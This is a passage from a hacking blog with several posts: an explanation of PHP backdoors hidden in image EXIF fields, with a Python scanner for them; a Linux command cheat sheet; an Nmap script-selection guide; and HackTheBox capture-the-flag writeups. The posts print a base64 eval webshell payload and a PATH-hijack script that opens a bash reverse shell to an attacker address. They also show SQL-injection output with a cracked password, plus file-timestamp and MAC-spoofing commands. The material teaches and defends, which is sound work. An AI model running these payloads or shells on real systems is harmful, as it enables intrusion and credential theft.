Here, you’ll find all the latest hacking news from around the world.

Thursday, January 28, 2021

WEBSHELL BACKDOOR CODE IN IMAGE FILES

STEGANOGRAPHY APPLIED FOR WEB EXPLOITATION


Before starting, let's introduce or refresh a couple of concepts that will come in useful later on.

Metadata 

As Wikipedia reports, metadata is "data that provides information about other data". In other words, it is "data about data" .

As an example, it is what you see when you right-click on an image and open the 'Details' tab.





This metadata is called EXIF data, which stands for Exchangeable Image File Format. Most digital photo software can display EXIF information, but usually does not let you edit it.

The Exif file format is built on the JPEG file format: Exif inserts image and digital-camera information, plus a thumbnail image, into the JPEG in conformity with the JPEG specification. As a result, Exif image files are displayed by any JPEG-compliant browser, picture viewer or photo-retouching software as ordinary JPEG images.

As the title suggests, the Exif structure fields can be leveraged by an attacker to hide malicious scripts.


Consider a simple image like this one:





At first sight there's nothing suspicious, right?

Now, using exiftool (a lightweight tool downloadable from here), we can take a look at what the image is hiding in its metadata.



Within the Exif data there are two suspicious entries, "Copyright" and "Document Name", that contain respectively:
/.*/e
and
eval(base64_decode('JF9QT1NUWydwYXNzd29yZCddKTs='));

"/.*/e" is a PCRE regex carrying the e modifier: when passed to preg_replace, it makes PHP evaluate the replacement string, here the data from $exif['DocumentName'], as code.

How can an attacker use these scripts?

Consider this PHP script:



The first line downloads the remote JPEG image file with the code stashed in it and then sets the $exif variable with the array values. The variable will have this structure:



The final step in this process is to execute the PHP preg_replace function.

Notice that the $exif['Copyright'] value uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL), which makes preg_replace evaluate the data from the $exif['DocumentName'] value as PHP code.


Knowing how it works and what it looks like, how can we hunt for it?

There are many ways, tools and techniques that can be used.
One example is a script found on Pastebin that looks for UserComment entries and checks them for the "/e" PCRE regex modifier.




If the script finds that modifier within the entry, it outputs the file name to the console to alert us that the file is potentially dangerous.
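The same hunt can be done without a PHP interpreter. Below is an added Python scanner (not the Pastebin script and not the post's own code): it walks a JPEG's marker segments, parses the Exif TIFF directory for the string tags the post mentions (Copyright, DocumentName and, in the Exif sub-IFD, UserComment) and flags values that look like PHP code, the "/e" modifier included. The sample images are constructed inside the script so it runs offline; the heuristics and tag list are my own choices, not a published rule set, and the builder writes only a header with no picture data.

```python
import re
import struct

# TIFF/Exif tag ids used below (IFD0 unless noted) and the pointer to the Exif sub-IFD
TAG_DOCUMENT_NAME = 0x010D
TAG_COPYRIGHT = 0x8298
TAG_EXIF_IFD = 0x8769
TAG_USER_COMMENT = 0x9286           # lives in the Exif sub-IFD, type UNDEFINED
TAG_NAMES = {TAG_DOCUMENT_NAME: "DocumentName", TAG_COPYRIGHT: "Copyright",
             TAG_USER_COMMENT: "UserComment"}
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}

# Review heuristics (my choice, not a published rule set). The first is the pattern from
# the post: a delimited regex whose modifier list contains PHP's 'e'.
SUSPICIOUS = [
    ("pcre_e_modifier", re.compile(r"^\s*([/#~%|!@]).*\1[imsxuADSUXJ]*e[imsxuADSUXJ]*\s*$", re.S)),
    ("eval_base64", re.compile(r"eval\s*\(\s*base64_decode", re.I)),
    ("php_superglobal", re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("dangerous_call", re.compile(r"\b(system|exec|shell_exec|passthru|assert|preg_replace)\s*\(", re.I)),
]


def extract_exif(data):
    """Walk the JPEG marker segments and return the TIFF payload of APP1/Exif, or None."""
    if data[:2] != b"\xFF\xD8":
        return None
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xDA:                       # start of scan: no more header segments
            break
        (length,) = struct.unpack_from(">H", data, pos + 2)
        payload = data[pos + 4:pos + 2 + length]
        if marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            return payload[6:]
        pos += 2 + length
    return None


def _parse_ifd(tiff, offset, endian, fields):
    """Collect string-valued tags from one IFD, following the Exif sub-IFD pointer."""
    (count,) = struct.unpack_from(endian + "H", tiff, offset)
    for i in range(count):
        entry = offset + 2 + 12 * i
        tag, typ, n = struct.unpack_from(endian + "HHI", tiff, entry)
        size = TYPE_SIZES.get(typ, 1) * n
        if size <= 4:                            # short values are stored inline
            raw = tiff[entry + 8:entry + 8 + size]
        else:                                    # longer ones live at an offset
            (off,) = struct.unpack_from(endian + "I", tiff, entry + 8)
            raw = tiff[off:off + size]
        if tag == TAG_EXIF_IFD:
            (sub,) = struct.unpack_from(endian + "I", tiff, entry + 8)
            _parse_ifd(tiff, sub, endian, fields)
        elif typ == 2:                           # ASCII, NUL-terminated
            fields[tag] = raw.rstrip(b"\x00").decode("latin-1")
        elif tag == TAG_USER_COMMENT:            # 8-byte character-set code, then the text
            fields[tag] = raw[8:].rstrip(b"\x00").decode("latin-1")


def parse_exif_strings(tiff):
    """Map tag id -> text for every string tag in IFD0 and the Exif sub-IFD."""
    endian = "<" if tiff[:2] == b"II" else ">"
    magic, ifd0 = struct.unpack_from(endian + "HI", tiff, 2)
    if magic != 42:
        raise ValueError("not a TIFF header")
    fields = {}
    _parse_ifd(tiff, ifd0, endian, fields)
    return fields


def scan_jpeg(data):
    """Return [(tag_name, heuristic), ...] for Exif strings that look like PHP code; [] if clean."""
    tiff = extract_exif(data)
    if tiff is None:
        return []
    try:
        fields = parse_exif_strings(tiff)
    except (struct.error, ValueError):
        return [("<exif>", "malformed_exif")]    # truncated or bogus directory: worth a look too
    findings = []
    for tag, text in sorted(fields.items()):
        for name, pattern in SUSPICIOUS:
            if pattern.search(text):
                findings.append((TAG_NAMES.get(tag, hex(tag)), name))
    return findings


def build_exif_jpeg(strings):
    """Constructed sample: a minimal JPEG (SOI, APP1/Exif, EOI) carrying ASCII IFD0 tags.
    It has no image data; it exists only so the scanner has something to parse offline."""
    n = len(strings)
    entries, blob = b"", b""
    data_start = 8 + 2 + 12 * n + 4              # header, entry count, entries, next-IFD pointer
    for tag, text in sorted(strings.items()):    # TIFF requires ascending tag order
        val = text.encode("latin-1") + b"\x00"
        if len(val) <= 4:
            entries += struct.pack("<HHI", tag, 2, len(val)) + val.ljust(4, b"\x00")
        else:
            entries += struct.pack("<HHII", tag, 2, len(val), data_start + len(blob))
            blob += val
    tiff = (b"II" + struct.pack("<HI", 42, 8) + struct.pack("<H", n)
            + entries + struct.pack("<I", 0) + blob)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xFF\xD8\xFF\xE1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xFF\xD9"


# Constructed samples: the two strings from the post, and a harmless copyright notice
SAMPLE_BACKDOORED = build_exif_jpeg({
    TAG_COPYRIGHT: "/.*/e",
    TAG_DOCUMENT_NAME: "eval(base64_decode('JF9QT1NUWydwYXNzd29yZCddKTs='));",
})
SAMPLE_CLEAN = build_exif_jpeg({TAG_COPYRIGHT: "(c) 2021 Example Photographer"})

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = scan_jpeg(fh.read())
        print(path, "SUSPICIOUS" if hits else "clean", hits)
```

Run it with image paths as arguments (`python3 exifscan.py images/uploads/*.jpg`). Anything flagged goes to a reviewer: the "/e" heuristic will also catch an innocent path-like copyright string whose last segment happens to be spelt only with PCRE modifier letters, which is the price of not having to decode the payload first.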

 
A tool called PHP Malware Finder, available on GitHub, can also be used.





PHP-malware-finder is a script used to detect obfuscated code, as well as files using PHP functions often found in web shells. Detection is performed by crawling the filesystem and testing files against a set of YARA rules.

The Loki and THOR IOC scanners created by Nextron Systems also deserve a mention.
Their indicators can be derived from published incident reports, forensic analyses or malware sample collections.




 
Conclusions:

This is not a new technique, but it is important to highlight because today, for performance reasons, many organizations opt to scan only PHP files and exclude other file types from scanning, overlooking file types that should not be classified as less important.

Moreover, even though the e modifier (PREG_REPLACE_EVAL) was deprecated in PHP 5.5.0 and removed as of PHP 7.0.0, this does not mean the attack is no longer prevalent. If the corporate environment is running PHP applications and is not on the latest version of PHP, then it is susceptible.



References:

https://www.media.mit.edu/pia/Research/deepview/exif.html
https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php

-G4d4r3L

Tuesday, January 5, 2021

linux cheat sheet



Everyone knows: cheat sheets are cool! They are very useful if you already know the basics about a topic but you have to look up details when you are not sure about something.

Especially, if you are new to a certain topic and you have to learn a lot of new stuff, it’s sometimes very hard to memorize everything.

Linux Network Commands
Command                                        Description

watch ss -tp                                   Network connections
netstat -ant                                   TCP connections (-anu = UDP)
netstat -tulpn                                 Connections with PIDs
lsof -i                                        Established connections
smb://<ip>/share                               Access Windows SMB share
share user x.x.x.x c$                          Mount Windows share
smbclient -U user \\\\<ip>\\<share>            SMB connect
ifconfig eth# <ip>/<cidr>                      Set IP and netmask
route add default gw <gw_ip>                   Set gateway
ifconfig eth# mtu [size]                       Change MTU size
export MAC=xx:xx:xx:xx:xx:xx                   Change MAC (store it for the next line)
ifconfig <int> hw ether <MAC>                  Change MAC
macchanger -m <MAC> <int>                      Kali MAC changer
iwlist <int> scan                              Built-in Wi-Fi scanner
dig -x <ip>                                    Domain lookup for IP
host <ip>                                      Domain lookup for IP
host -t SRV _<service>._tcp.url.com            DNS SRV lookup
dig @<ip> <domain> -t AXFR                     DNS zone transfer
host -l <domain> <namesvr>                     DNS zone transfer
ip xfrm state list                             Print existing VPN keys
ip addr add <ip>/<cidr> dev eth0               Add a 'hidden' interface address
grep DHCP /var/log/messages                    List DHCP assignments
tcpkill host <ip> and port <port>              Block ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward       Turn on IP forwarding
echo "nameserver x.x.x.x" > /etc/resolv.conf   Add DNS server


Linux SYSTEM INFO
Command                                        Description

nmblookup -A <ip>                              Get NetBIOS hostname for <ip>
id                                             Current user and groups
w                                              Logged-on users
who -a                                         User information
last -a                                        Last users logged on
ps -ef                                         Process listing (or top)
df -h                                          Disk usage (or free)
uname -a                                       Kernel version/CPU info
mount                                          Mounted file systems
getent passwd                                  Show list of users
PATH=$PATH:/home/mypath                        Add to PATH variable
kill <pid>                                     Kill process with <pid>
cat /etc/issue                                 Show OS info
cat /etc/*release*                             Show OS version info
cat /proc/version                              Show kernel info
rpm -qa                                        Installed pkgs (Red Hat)
rpm -ivh *.rpm                                 Install RPM (-e = remove)
dpkg --get-selections                          Installed pkgs (Ubuntu)
dpkg -i *.deb                                  Install DEB (-r = remove)
pkginfo                                        Installed pkgs (Solaris)
which <tcsh/csh/ksh/bash>                      Show location of executable
chmod 750 <tcsh/csh/ksh>                       Disable <shell>, force bash


Linux UTILITY COMMANDS

Command                                        Description

wget http://<url> -O url.txt -o /dev/null      Grab URL
rdesktop <ip>                                  Remote Desktop to <ip>
scp /tmp/file user@x.x.x.x:/tmp/file           Put file
scp user@<remoteip>:/tmp/file /tmp/file        Get file
useradd -m <user>                              Add user
passwd <user>                                  Change user password
userdel <user>                                 Remove user
script -a <outfile>                            Record shell: Ctrl-D stops
apropos <subject>                              Find related commands
history                                        View user's command history
!<num>                                         Execute line # in history

Linux FILE COMMANDS

Command                                        Description

diff file1 file2                               Compare files
rm -rf <dir>                                   Force delete of <dir>
shred -f -u <file>                             Overwrite/delete file
touch -r <ref_file> <file>                     Match ref_file timestamp
touch -t YYYYMMDDhhmm <file>                   Set file timestamp
sudo fdisk -l                                  List connected drives
mount /dev/sda# /mnt/usbkey                    Mount USB key
md5sum -t file                                 Compute MD5 hash
echo -n "str" | md5sum                         Generate MD5 hash
sha1sum file                                   SHA1 hash of file
sort -u                                        Sort/show unique lines
grep -c "str" file                             Count lines w/ "str"
tar cf file.tar files                          Create .tar from files
tar xf file.tar                                Extract .tar
tar czf file.tar.gz files                      Create .tar.gz
tar xzf file.tar.gz                            Extract .tar.gz
tar cjf file.tar.bz2 files                     Create .tar.bz2
tar xjf file.tar.bz2                           Extract .tar.bz2
gzip file                                      Compress/rename file
gzip -d file.gz                                Decompress file.gz
upx -9 -o out.exe orig.exe                     UPX packs orig.exe
zip -r <zipname.zip> <directory>/              Create zip
dd skip=1000 count=2000 bs=8 if=file of=file   Cut blocks 1K-3K from file
split -b 9K <file> <prefix>                    Split file into 9K chunks
awk 'sub("$","\r")' unix.txt > win.txt         Windows-compatible text file
find / -iname '*.pdf' -type f                  Find PDF files
find / \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;   Search for setuid/setgid files
dos2unix <file>                                Convert to *nix format
file <file>                                    Determine file type/info
chattr (+/-)i <file>                           Set/unset immutable bit

Thursday, December 31, 2020

Nmap's script categories - full potential unleashed



I know that almost all of you already know that Nmap provides scripts for analysing the target. Many of us just add the "-sC" option and go, right? No.
That runs only the default scripts, a subcategory of roughly 120 scripts.

Everyone uses Nmap, but not everyone knows the full potential of Nmap's scripts.
In this article, we will take a deeper look at the scripts and the full potential of nmap.

First of all, where are the scripts stored, and what types of scripts do we have at our disposal?


This command will show you the different category:

grep -r categories /usr/share/nmap/scripts/*.nse | cut -d ":" -f 2 | grep -oP '"(.*?)"' | sort -u



If you are up against an SMB service, as often happens, and you run the -sC option, you will never see whether it is vulnerable to MS17-010, better known as EternalBlue. Its script falls under the "vuln" and "safe" categories, not "default".


Nmap allows the use of scripts simply by adding the "--script" option.
This option can take:

1. script name
2. NSE category
3. Path to an NSE file
4. Folder containing scripts
5. An expression

Expressions allow incredible flexibility when selecting scripts, as we will see in the following sections.


> Selecting by script name or category



To select a whole category, simply use the name of the category as the argument. 
For example to run the exploit category use the following command:

nmap --script exploit <target>


You can also run several categories by separating them with a comma:

nmap --script discovery,intrusive <target>


> Selecting by filename or folder



In order to execute an NSE script file, we can use this syntax:

nmap --script /path/to/script.nse <target>


Similarly, with categories you can execute several scripts by separating paths with a comma:

nmap --script /path/to/script.nse,/another/path/script2.nse <target>


To execute all the scripts contained in a folder, we only need to pass the folder name as an argument:

nmap --script /path/to/folder/ <target>


> Advanced script selection with expressions



Expressions are used to describe sets of scripts. We will now go through different scenarios where we can take advantage of script selection.

In this example the "not exploit" expression will match any script that does not belong to the exploit category:

nmap -sV --script "not exploit" <target>


The or and and operators allow constructing more complex logical expressions. The following expression will match any script that is not inside the intrusive, dos or exploit categories:

nmap --script "not(intrusive or dos or exploit)" -sV <target>


If we would like to execute all scripts within the broadcast and discovery categories, we'll use:

nmap --script "broadcast and discovery" <target>


If you are selecting scripts, you can also use the wildcard character, *:

nmap --script "snmp-*" <target>


Of course, we can combine wildcards and expressions. For example, let's run all the scripts whose names contain http, but exclude some kind of scripts like http-slowloris, http-brute, http-form-fuzzer or http-enum:

nmap --script "*http* and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" <target>


We can also combine wildcarded filters with expressions when selecting categories. The next command executes all scripts whose names begin with http- that are not in the exploit category:

nmap --script "http-* and not(exploit)" <target>
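To make the selection rules of this section concrete, here is an added Python model of them (not nmap's own code): it tokenizes an expression, parses it with the precedence nmap documents (not binds tightest, then and, then or, with a comma behaving like or) and evaluates it against a constructed catalogue of script names and categories. The catalogue memberships are illustrative assumptions, not nmap's real data, and the model ignores the file-path and directory forms of --script.

```python
import fnmatch
import re

# Constructed mini-catalogue: script name -> categories (illustrative assumptions, not nmap's data)
CATALOG = {
    "http-title": {"default", "discovery", "safe"},
    "http-enum": {"discovery", "intrusive", "vuln"},
    "http-slowloris": {"dos", "intrusive"},
    "http-brute": {"brute", "intrusive"},
    "smb-vuln-ms17-010": {"vuln", "safe"},
    "snmp-info": {"default", "discovery", "safe"},
    "ssh-hostkey": {"default", "discovery", "safe"},
}

_TOKEN = re.compile(r"\s*(\(|\)|,|[^\s(),]+)")
_RESERVED = {"and", "or", "not", "(", ")", ","}


def tokenize(expr):
    """Split an expression into parentheses, commas and words (names, globs or keywords)."""
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        tokens.append(m.group(1))
        pos = m.end()
    return tokens


def _either(a, b):
    return lambda name, cats: a(name, cats) or b(name, cats)


def _both(a, b):
    return lambda name, cats: a(name, cats) and b(name, cats)


class _Parser:
    """Recursive descent: or-expr > and-expr > not-expr > primary, lowest precedence first."""

    def __init__(self, tokens):
        self.tokens, self.i = tokens, 0

    def _peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else None

    def _next(self):
        tok = self._peek()
        self.i += 1
        return tok

    def parse(self):
        pred = self._or()
        if self._peek() is not None:
            raise ValueError("unexpected token %r" % self._peek())
        return pred

    def _or(self):
        left = self._and()
        while self._peek() in ("or", ","):       # a comma-separated list behaves like 'or'
            self._next()
            left = _either(left, self._and())
        return left

    def _and(self):
        left = self._not()
        while self._peek() == "and":
            self._next()
            left = _both(left, self._not())
        return left

    def _not(self):
        if self._peek() == "not":
            self._next()
            inner = self._not()
            return lambda name, cats: not inner(name, cats)
        return self._primary()

    def _primary(self):
        tok = self._next()
        if tok == "(":
            inner = self._or()
            if self._next() != ")":
                raise ValueError("expected ')'")
            return inner
        if tok is None or tok in _RESERVED:
            raise ValueError("expected a script or category name, got %r" % tok)
        word = tok.lower()
        if word.endswith(".nse"):                # a bare file name is matched without its suffix
            word = word[:-4]
        # A word is either a category name or a (wildcard) pattern over script names
        return lambda name, cats: word in cats or fnmatch.fnmatchcase(name, word)


def select_scripts(expr, catalog=CATALOG):
    """Sorted names of the catalogue scripts an nmap-style --script expression selects."""
    pred = _Parser(tokenize(expr)).parse()
    return sorted(name for name, cats in catalog.items() if pred(name, cats))


if __name__ == "__main__":
    for e in ("default", "vuln", "not(intrusive or dos or exploit)", "http-* and not(exploit)"):
        print("%-40s -> %s" % (e, ", ".join(select_scripts(e))))
```

Evaluating "default" against the catalogue leaves the MS17-010 check out, while "vuln" brings it in, which is exactly the point made about -sC above; swap the catalogue for the output of the grep one-liner from the start of the article to test an expression against your own installation before a long scan.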


> NSE script arguments



The --script-args Nmap option is used to set arguments in NSE scripts. For example, if we would like to set the http library argument "user agent", we can run:

nmap -sV --script http-title --script-args http.useragent="Mozilla 1337" <target>


Not many Nmap users know this, but we can also omit the script name when setting arguments:

nmap -p80 --script http-trace --script-args path <target>

We can use the preceding form instead of this one:

nmap -p80 --script http-trace --script-args http-trace.path <target>


> Loading script arguments from a file



If you are planning to run several scans, it is probably a good idea to write down your script arguments in a file to save some typing. NSE supports loading NSE arguments from an absolute or relative path with the --script-args-file option. 

The arguments contained in the file must be separated by commas or new lines:


nmap --script "discovery,broadcast" --script-args-file nmap-args.txt <target>


nmap-args.txt
_____________________________________________________

http.useragent=Not Nmap
http.max-connections=50
userdb=/path/to/usernames.lst
passdb=/path/to/dictionary.lst
_____________________________________________________

> Forcing the execution of NSE scripts


Let's talk about how to force the execution of particular scripts.

Nmap can force the execution of an NSE script by prepending a "+" to the script name:

nmap --script +<script selection> <<arg1, arg2, …>>


If we want to force the execution of only the http-title NSE script against the service running on port 1212, thus saving a lot of time, we can run:

nmap --script +http-title -p1212 192.168.1.210


Without the "+" sign the script would not run, but since we added it, the report comes back with the following:

_____________________________________________________

Nmap scan report for 192.168.1.210
Host is up (0.00026s latency).
PORT     STATE SERVICE
1212/tcp open  lupa
|_http-title: W00t!
_____________________________________________________

> Debugging NSE scripts



If you need to analyze the traffic sent and received by NSE, use the --script-trace option. For example, if you would like to see the payloads sent by the NSE scripts in the exploit category, you can use this expression:

nmap --script exploit --script-trace <target>


You can also turn on Nmap's debug mode with the -d[1-9] flag. The flag is followed by an integer between 1 and 9 that denotes the debug level: the higher the level, the more verbose the output. Here is an example with a mid level:

nmap -sV --script exploit -d4 <target>


The --packet-trace option includes all the packets sent and received, not only the traffic generated by NSE. It is useful when it comes to analysing what we are actually doing:

nmap -O --script myscript.nse --packet-trace <target>


See you next time with an article on an awesome SMB exploit using all of nmap's potential!




-G4d4r3L-


Wednesday, December 30, 2020

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn't want me to visit /writeup. Which is exactly what I did!
There wasn't much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as 'CMS Made Simple', something exploit-db has several exploits for.
I found an SQL injection exploit which didn't need any valid credentials, and since I wasn't able to identify the version of CMS Made Simple running, I decided to give it a try.

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password 'raykayjay9' which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called 'run-parts' into either of the above dirs?

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1

Running chmod +x to make the above script executable and starting a reverse netcat listener:

nc -lvnp 9001

All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!


Tuesday, December 29, 2020

Magic Hackthebox

 



Welcome readers, today we will be doing the Hack The Box (HTB) challenge.

Enumeration

Starting off with a little nmap, we see SSH and HTTP open.

root@kali:~/Documents/HackTheBox/Magic# nmap -Pn -sS -n -p1-10000 -T4 -sV 10.10.10.185 -vv
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
...
A quick check for OpenSSH v7.6p1 vulnerabilities doesn’t seem to give us anything, so let’s move on to port 80.
At first glance, there are just a bunch of images on the site - nothing too interesting. Of note in the source code, however, are references to images located in images/uploads. This will be useful later.



Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.


Foothold

Now, we are presented with a very simple login dialog box. The login process appears to be pretty standard in that it POSTs a username and password to the PHP backend.



Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:
...



Fuzzy HackTheBox WEB (Test)


Welcome readers, today we will be doing the Hack The Box (HTB) challenge.

Finding the Page

We have this nice website in front of us..


Let’s start off with our basic gobuster..

Command

gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

Command Explanation

-w (wordlist)
-t (50 threads)
-x (look for these extensions in the brute force)

OUTPUT

[rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

=====================================================
Gobuster v2.0.1
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://docker.hackthebox.eu:42566/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : htm,php,txt,html
[+] Timeout      : 10s
=====================================================
2020/12/11 00:48:35 Starting gobuster
=====================================================
/index.html (Status: 200)
/css (Status: 301)
/js (Status: 301)
/api (Status: 301)

Now we have an interesting directory named api, so let's run gobuster against it...

Command

gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

OUTPUT

[rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

=====================================================
Gobuster v2.0.1
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://docker.hackthebox.eu:42566/api/
[+] Threads      : 50
[+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt,html,htm
[+] Timeout      : 10s
=====================================================
2020/12/11 00:50:53 Starting gobuster
=====================================================
/index.html (Status: 200)
/action.php (Status: 200)

We found action.php. Let's see what we have on this one...

Error: Parameter not set

So now we need to find the GET parameter used by this endpoint.

Finding the parameter

For this we will use wfuzz, which can be found here.

Command

wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test

Command Explanation

  • --hh (hide responses whose body has this many characters)
  • -c (output with colours)
  • -w (wordlist)
  • FUZZ (the FUZZ keyword is replaced by each word from the wordlist)

OUTPUT

[rikozi@rikozi tmp]$ wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000015356:   200        0 L      5 W      27 Ch       "reset"

Total time: 399.9509
Processed Requests: 20469
Filtered Requests: 20468
Requests/sec.: 51.17877

Now we have found our parameter, reset. Let's see what this parameter gives us...

Error: Account ID not found

Now we will have to brute-force the Account ID.

Finding Account ID

We will again use wfuzz, but this time we will set the character length to 27 (you can find this by simply counting it)...

Command

wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ

OUTPUT

[rikozi@rikozi tmp]$ wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000318:   200        0 L      10 W     74 Ch       "20"

So we got the account ID. Let's finalise the URL and see what the output is...

URL: http://docker.hackthebox.eu:42566/api/action.php?reset=20

And we got the flag.

Thank you guys, if you liked this writeup stay tuned for more!

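Seen from the server side, the two wfuzz runs in this writeup leave a very recognisable trace in the web server's access log: one client hitting the same endpoint with a different query-parameter name on almost every request for several minutes. As an added example (not part of the writeup), here is a Python detector for that pattern over Apache combined-format log lines. It uses a sliding time window per (client, path) pair and counts distinct parameter names, so ordinary users who reuse a handful of names never trigger it. The log lines, parameter names and thresholds are constructed or assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log format, as far as this detector needs it
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """One combined-format line -> dict (ip, ts, path, params, status, size); None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": url.path,
        "params": [k for k, _ in parse_qsl(url.query, keep_blank_values=True)],
        "status": int(m["status"]),
        "size": 0 if m["size"] == "-" else int(m["size"]),
    }


def detect_param_fuzzing(lines, window_seconds=60, min_distinct_params=20):
    """Flag (client, endpoint) pairs where one client used many *different* query-parameter
    names against the same path inside a sliding window of window_seconds."""
    events = defaultdict(list)                       # (ip, path) -> [(ts, param name), ...]
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["params"]:
            continue
        for name in rec["params"]:
            events[(rec["ip"], rec["path"])].append((rec["ts"], name))

    findings = []
    for (ip, path), evs in events.items():
        evs.sort()
        counts, start, peak = {}, 0, 0               # counts: names currently inside the window
        for ts, name in evs:
            counts[name] = counts.get(name, 0) + 1
            while (ts - evs[start][0]).total_seconds() > window_seconds:   # slide the window forward
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            peak = max(peak, len(counts))
        if peak >= min_distinct_params:
            findings.append({"ip": ip, "path": path, "peak_distinct_params": peak})
    return findings


# Constructed parameter names (wordlist-style) and a constructed log: one client tries 25
# different names against /api/action.php in 25 seconds, another client browses normally.
PARAM_NAMES = ["id", "user", "name", "page", "reset", "token", "key", "q", "search", "file",
               "path", "action", "cmd", "debug", "lang", "order", "sort", "limit", "offset",
               "type", "format", "view", "mode", "admin", "test"]


def build_sample_log():
    base = datetime(2020, 12, 11, 0, 48, 35, tzinfo=timezone.utc)
    fmt = '%s - - [%s] "GET %s HTTP/1.1" %d %d "-" "Mozilla/5.0"'

    def stamp(secs):
        return (base + timedelta(seconds=secs)).strftime("%d/%b/%Y:%H:%M:%S %z")

    lines = [fmt % ("203.0.113.7", stamp(i), "/api/action.php?%s=test" % p, 200, 24)
             for i, p in enumerate(PARAM_NAMES)]
    lines += [
        fmt % ("198.51.100.5", stamp(40), "/index.html", 200, 1532),
        fmt % ("198.51.100.5", stamp(45), "/api/action.php?reset=20", 200, 74),
        "this line is not in combined format and is skipped",
    ]
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for hit in detect_param_fuzzing(SAMPLE_LOG):
        print("parameter fuzzing: %(ip)s against %(path)s, %(peak_distinct_params)d distinct names" % hit)
```

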